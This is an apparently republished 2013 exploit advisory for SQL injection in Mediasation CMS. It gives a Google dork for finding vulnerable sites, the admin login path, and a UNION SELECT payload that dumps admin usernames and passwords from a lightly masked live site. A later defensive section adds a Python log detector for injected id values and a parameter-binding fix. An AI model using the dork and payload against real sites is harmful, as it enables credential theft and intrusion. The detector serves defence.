Mediasation CMS SQL Injection Vulnerability

2013.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###############################################
# Exploit Title : Mediasation CMS SQL Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.Ashiyane.org
#
# Security Risk : Medium - SQL Injection
#
# Vendor Page : www.mediasation.com
#
# Google Dork :" CMS by Mediasation" &"id="
#
#################################################
# vul location: Http://site/*.php?id=[SQLi]
#
# Admin Page : Http://site/login.php
#
# DEMO:
# ------------------------------------------------------------------------------------
# | www.coveXtdove.com/facility-details.php?id=31 |
# | www.coveXove.com/facility-details.php?id=-31%27%20UNION%20SELECT%201,group_concat%28username,0x3a,0x3a,password%29,
# | 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin_users--+
# ------------------------------------------------------------------------------------
#
# [ for inject use Havij OR inject manually ]
#
# Spacial TnX : Reza-S4T4n ,C4T , TrojanMan
# Alireza666 , milvar , Remove , B4b4K KH4TaR ,
# PrinceofHacking , sil3nt ,...
#################################################
# Greetz to: My Lord ALLAH
#################################################
#
# bY T3rm!nat0r5
#
#################
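
A log check for the pattern this advisory describes, an `id` parameter on `*.php` pages that should only ever carry an integer. This is an added example, not part of the original advisory; the log lines, client addresses and function names are constructed for illustration and assume a combined-format access log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Mar/2013:10:00:01 +0000] "GET /facility-details.php?id=31 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Mar/2013:10:00:07 +0000] "GET /facility-details.php?id=-31%27%20UNION%20SELECT%201,2,3--+ HTTP/1.1" 200 7340
203.0.113.9 - - [24/Mar/2013:10:00:09 +0000] "GET /news.php?id=4%2527%2520order%2520by%252017 HTTP/1.1" 200 610
198.51.100.2 - - [24/Mar/2013:10:01:00 +0000] "GET /login.php HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Tokens that have no place in a numeric id: quotes, comments, UNION/ORDER BY.
SQL_TOKENS = re.compile(r"(?i)\bunion\b.*\bselect\b|\border\s+by\b|group_concat|--|/\*|'")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2527) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id_requests(log_text):
    """Return (client, path, reason, decoded_value) for every non-integer id."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(".php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value = fully_decode(raw)
            if re.fullmatch(r"\d+", value):
                continue  # the only shape a legitimate id should have
            reason = "sql-tokens" if SQL_TOKENS.search(value) else "non-numeric"
            findings.append((client, url.path, reason, value))
    return findings

if __name__ == "__main__":
    for finding in suspicious_id_requests(SAMPLE_LOG):
        print(finding)
```

The same allow-list (digits only) is the server-side fix: reject or cast the `id` value to an integer and bind it as a query parameter instead of concatenating it into SQL.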



Copyright 2024, cxsecurity.com

 
